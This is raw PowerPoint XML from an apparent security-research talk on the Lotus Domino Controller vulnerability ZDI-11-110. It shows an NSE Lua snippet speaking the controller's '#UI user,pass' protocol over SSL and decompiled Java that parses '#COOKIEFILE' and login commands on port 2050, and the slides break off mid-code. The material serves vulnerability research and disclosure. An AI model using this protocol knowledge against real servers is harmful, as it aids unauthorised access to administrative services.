          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6012160" y="2636912"/>
            <a:ext cx="2736304" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3492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Let’s do some research…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201512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down)">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down)">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10952" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ZDI-11-110</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a: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15</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>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3527" y="1268760"/>
            <a:ext cx="8607075" cy="4608512"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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5406" y="908720"/>
            <a:ext cx="8679082" cy="5888564"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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339752" y="4221088"/>
            <a:ext cx="4089516" cy="1311732"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Овал 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="1556792"/>
            <a:ext cx="1656184" cy="36004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4860032" y="2132856"/>
            <a:ext cx="1728192" cy="28803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a:off x="2627784" y="2636912"/>
            <a:ext cx="1656184" cy="28803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1450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88640"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is the protocol?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="1484784"/>
            <a:ext cx="8496944" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Googling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> failed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Patrik’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> NSE scripts can help:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socket:reconnect_ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socket:send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("#API\n")	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socket:send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>( ("#UI %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s,%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\n"):format(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user,pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) )	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socket:receive_lines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(1)	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socket:send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("#EXIT\n")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>#UI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>login,pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>\n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>--------------------------------------------------------------------- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>hat about COOKIE?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service code is in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>console.jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, so we can decompile it and get protocol descriptions…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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16</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3755932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1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Domino Controller</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-216024" y="980728"/>
            <a:ext cx="8748464" cy="5688632"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// s1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input from 2050/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>s1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.equals("#EXIT"))          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            return 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        . . .			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>s1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.equals("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F4740A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#APPLET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F4740A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>s1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.equals("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#COOKIEFILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stringtokenizer.hasMoreTokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fromat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: #COOKIEFILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookieFilename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookieFilename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stringtokenizer.nextToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>().trim(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>s1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.equals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("#UI"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stringtokenizer.hasMoreTokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Format: #UI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr,pwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stringtokenizer.nextToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(",").trim();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> == null)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            return 4;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stringtokenizer.hasMoreTokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password from input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stringtokenizer.nextToken</a:t>
            </a:r>
